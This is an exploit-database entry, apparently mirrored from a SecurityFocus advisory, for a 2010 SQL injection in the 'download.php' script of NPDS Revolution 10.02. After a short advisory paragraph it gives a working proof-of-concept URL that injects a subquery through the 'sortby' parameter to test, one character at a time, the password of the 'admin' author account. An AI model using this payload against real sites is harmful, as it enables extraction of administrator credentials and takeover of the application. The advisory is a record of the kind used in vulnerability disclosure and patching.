NPDS REvolution 10.02 - 'download.php' SQL Injection



EKU-ID: 38754 CVE: OSVDB-ID:
Author: High-Tech Bridge SA Published: 2010-05-13 Verified: Verified
Download:

Rating

☆☆☆☆☆
Home


source: https://www.securityfocus.com/bid/40156/info

NPDS Revolution is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.

Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.

NPDS Revolution 10.02 is vulnerable; other versions may also be affected.

http://www.example.com/download.php?dcategory=All&sortby=%28select%20did%20from%20authors+where+aid=char%2897,100,109,105,110%29+and+substr%28pwd,1,1%29=char%2848%29%29+DESC--